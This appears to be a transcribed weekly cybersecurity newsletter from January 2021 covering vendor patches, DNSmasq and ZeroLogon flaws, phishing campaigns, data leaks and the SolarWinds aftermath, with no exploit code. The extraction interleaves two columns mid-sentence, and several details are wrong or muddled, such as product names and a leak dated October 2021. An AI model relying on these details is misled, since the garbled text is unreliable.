Weekly cyber-facts in review 24/01/21 - Aiuken
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
Weekly cyber-facts in review 24/01/21
Vulnerabilities In Review
Cisco This week Cisco has released a batch of patches to address high criticality vulnerabilities. Such vulnerabiltiies affected SD-WAN, DNA Center and SSMS produts, allowing on them to execute code remotely and in some cases with administrator privileges. An attacker could take control of the affected products as result. At the time this repport is weritten, there is no notice about those vulnerabilities being exploited. Siemens Siemens has released a set of patches for both development tools (Siemens Digital Industries Software) and OT switches. 24 vulnerabilities affecting development tools unleash a memory corruption. Those are triggered by uploading crafted files in 3D format. OT Switches from SCALANCE X series, are affected by two vulnerabilities allowing an attacker to position itself in the midle to receive all the traffic. Oracle The company has released 329 patchs fixing several issues across 20 products. Oracle's Fussion MiddleWare is the product which received most attantion with 60 patches having been released for it. In econd place Financial Services Applications received 50. Other patched products were MySQL, Retail Applications, E- Business Suite, Oracle VM, Supply Chain Management, Communications, Enterprise Manager, PeopleSoft, Communications Applications, Database Server, Construction and Engineering, Hyperion, JD Edwards, Health Sciences Applications, Systems, Siebel CRM, Insurance Applications, GraalVM, Food and Beverage Applications, Java SE and Utilities Applications. Apache Projects which take the popular server choice for web content as foundation received important patches this week. Fisrt Apache Tomcat, an Apache version which offers better integration with Java received a fix for the vulnerability which allows an attacker to retrieve forbidden resources when asked through NTFS interface (NTFS is the way Microsoft organises files within persistent memory memory). The second fixed vulnerability affects Apache Vulnerability Tools (a set of tools for web edition). If exploited, an attacker could inkect malicious code within the server.
Issues to keep in mind
DNSmask
Two sets of vulnerabilities were discovered in DNSmask. This software allows
integrated and non-integrated DNS servers to save DNS requests and responses. ZeroLogOn
DNS is the service which identifies a domain (exaple [.] com) with an IP (224 [.] 0
[.] 0 [.] 1), which at the end leads to a server. At the end of the summer of 2020, a vulnerability allowing taking
control of the Domain Controlers (the servers which support the list
The first set of vulnerabilities would allow an attacker to modify the relationship
of users and their privileges in Windows Systems) was discovered.
between IP's and domain names. And as a result, such attacker would have the
Such vulnerability can be triggered by submiting a log on attempt
capability to redirect the trafic of a potential victim throught a bad website, or
server with different services that use DNS requests. This is solved by enabling with a concatenation of 0's in it.
DNSSec, a way to secure against tampering those registries.
Microsoft released an initial patch allowing administrators to detect
However, the second set of vulnerabilities can be triggered once this DNSSec is
the vulnerability, but not a definitive fix was released. Now,
enabled. An attacker could cause a buffer overflow (a technique to write in
Microsoft warns that a second mitigation step is about to be
forbidden parts of the sistem memory with the hope to elevate privileges) with the
aim to take control of the device or to take it out of service. released in February 2021. Systems are going to be requested to
stablish a safe channel first to request for authorization.
So far products from Cisco, Android, Aruba, Technicolor, Red Hat, Siemens,
Ubiquiti networks or Comcast have been identified as affected by the
vulnerabilities.Phishing Campaigns in Review
FBI warns of employee credential phishing via Phishing campaign impersonating Ibercaja to
telephone and company´s chat steal credentials
The FBI has issued a Private Industry Notification (PIN) to It has been detected a campaign of fraudulent emails
warn of attacks targeting enterprises, in which threat actors impersonating Ibercaja, which aims is to direct the victim to a
attempt to obtain employee credentials through vishing or fraudulent page to steal their login credentials and banking
chat rooms. Threat actors search for an employee in the information.
company's chat room and then try to convince them to log in
into a fraudulent website to get their credentials
Phishing campaign uses Finger command Phishing campaign impersonating DGT to
to distribute a backdoor distribute malware
It has been identified that attackers are running a phishing
A phishing campaign has been detected in which attackers
campaign that uses the Windows Finger command to
allegedly send a traffic fine by impersonating the DGT. The
download and install the MineBridge backdoor on the victims'
aim of this campaign is to distribute a type of Dropper
devices. This command allows a local user to retrieve a list of
malware designed to take control of the victim's computer.
users on a remote machine or information from a particular
user.Other cases Code Leak Malware Skimmer Infostealer
SAP Nitro PDF leaked customers
In September 2020, SAP released patches for vulnerability CVE- During the week a database of 14GB of lenth and containing
2020-6207, affecting SAP's solution Manger. The vulnerability more than 77 million records of customers got published in
consists of a missing authorization verification in its web interace, Dark Web. The database is told (allegedly) to be linked to the
letting an attacker to obtain administration privileges. Now, code to incident that the company reported on October 21th 2021. At
exploit such vulnerability has been released, and scans to find that moment, the company deny any client leakage.
potential victims showing assets presenting the vulnerability have
been started.
Russian hacker are using a new malware
OpenWRT called Jupyter to steal information from their
victims
The project that develops and supports an Operative System for The malware Jupyter, which is an infostealer, was first identified
embeded devices, now reports a data breach. A criminal got in October 2020, but its development began in May or even
access on January 16th 2021 to OpenWRT forum administrator November 2019. This malware has been attributed to Russian
account, having accessed to emails, id's and statistics among hacker because most of his commands and control are located
other details. The project now urges users to reset their there.
passwords.The Big Hack Blow: The Aftermath
The Big Hack Blow: The
Aftermath
At the end of the past year (2020) a hack of SolarWind's infrastructure was discovered. The company develops and comercialises solutions to monitor the health of IT networks.
The company was compromised in order to distribute malware to its customers vis Orion monitoring platform. It was a major blow for U.S. administrations (some of the handling
very dangerous assets) and companies like Microsoft, Cisco, VMware... Up to this point is though that two different APT were involved in the attack against SolarWinds, and at
least four ad-hoc malware families were discovered.
As the time passes new victims are appearing. Past week Mimecast acknowledged having been affected by the hack and the certificates utilized for encripting communications
between client's (Microsoft 365) tenants and Mimecast's infrastructure compromised. Mimecast is a firm specialised in mail security and management, which means that with
the compromise of its products, its clients could be facing a databreach right now.
This week, a second company which sells cybersecurity products and services has acknowledged being affected too. Malwarebytes, says that it was comrpomised though a
mail security product embeded in its Microsoft 365 tenant (it was not reported the name of the product). Company assures that the impact is limited to a small ammount of
emails. However, it is the third company which sells cybersecurity products and services along with, previously mentioned, Mimecast and FireEye.
The previously exposed facts could be read in the sense that, quite often supply chain attacks are overlocked. FireEye, the company that discovered the hack, discovered that
the tool they trust to monitor its infrastructure, was compromised. And only then, with suspicacy, the companies which also relied on the tool with little reserve (in the past),
started to question what they have in their servers. It is commonly observed that because of the idea of trust, fearing hurting feelings and appearances, people forget to check.
But when the damage is done, little feelings can restore the lost secrets or the battered assets.Calle Francisco Tomás y Valiente nº 2
Boadilla del Monte · 28660 Madrid (España)
Teléfono:+34 912 909 805
aiuken.comYou can also read
